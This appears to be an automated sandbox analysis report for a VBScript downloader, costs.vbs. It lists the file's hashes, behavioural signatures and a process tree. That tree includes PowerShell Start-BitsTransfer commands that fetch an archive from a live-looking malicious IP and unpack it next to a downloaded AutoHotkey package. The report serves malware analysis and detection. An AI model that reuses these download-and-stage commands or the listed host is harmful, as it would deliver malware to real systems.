Analysis
-
max time kernel
121s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
10-05-2024 11:41
Static task
static1
Behavioral task
behavioral1
Sample
costs.vbs
Resource
win7-20240508-en
General
-
Target
costs.vbs
-
Size
821B
-
MD5
d789af96fc286fcccec141524b71d243
-
SHA1
a19b86fe0f698015bdaab5633d94be34daa7369c
-
SHA256
cc2de0a518487a5178c6184dcdf623ac7b89f6e7fb9a541d5630921d00a7de3e
-
SHA512
6e7519c10610bf6cfa5a583455c981e24c5a0f2f31142591c49c1e75b3e21a43a575207c3b9600faa953d8f128896353b4445713b069ccd7d4238daf50a4823d
Malware Config
Extracted
http://91.92.251.57:80/holo.png
Extracted
https://www.autohotkey.com/download/1.1/AutoHotkey112304_ansi.zip
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2220 powershell.exe 2640 powershell.exe 2824 powershell.exe 2128 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2220 powershell.exe Token: SeDebugPrivilege 2640 powershell.exe Token: SeDebugPrivilege 2824 powershell.exe Token: SeDebugPrivilege 2128 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3048 wrote to memory of 2220 3048 WScript.exe 28 PID 3048 wrote to memory of 2220 3048 WScript.exe 28 PID 3048 wrote to memory of 2220 3048 WScript.exe 28 PID 3048 wrote to memory of 2640 3048 WScript.exe 30 PID 3048 wrote to memory of 2640 3048 WScript.exe 30 PID 3048 wrote to memory of 2640 3048 WScript.exe 30 PID 3048 wrote to memory of 2824 3048 WScript.exe 32 PID 3048 wrote to memory of 2824 3048 WScript.exe 32 PID 3048 wrote to memory of 2824 3048 WScript.exe 32 PID 3048 wrote to memory of 2128 3048 WScript.exe 34 PID 3048 wrote to memory of 2128 3048 WScript.exe 34 PID 3048 wrote to memory of 2128 3048 WScript.exe 34
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\costs.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://91.92.251.57:80/holo.png' -Destination 'C:\Users\Public\holo.zip'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\holo.zip' -DestinationPath 'C:\Users\Public'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'https://www.autohotkey.com/download/1.1/AutoHotkey112304_ansi.zip' -Destination 'C:\Users\Public\c.zip'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\c.zip' -DestinationPath 'C:\Users\Public\'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2128
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5TR4RLRPQY347GCHAIR1.temp
Filesize7KB
MD5525f28bfe81859f8a84a21d041ede957
SHA1afd60695d94930a6299346ea2957aebc72f77122
SHA256924fab9854aef38f0baf744b066dd2ee662e3666b71f18bd2e96b5aa45c4307c
SHA512889a4930b3675d42ff76cabd56c6d75fe277c325c89030885346c228440145bd16a6a648cc4e23e6f139b61e2986e675e571ec08322e9515d1475dc708188e2d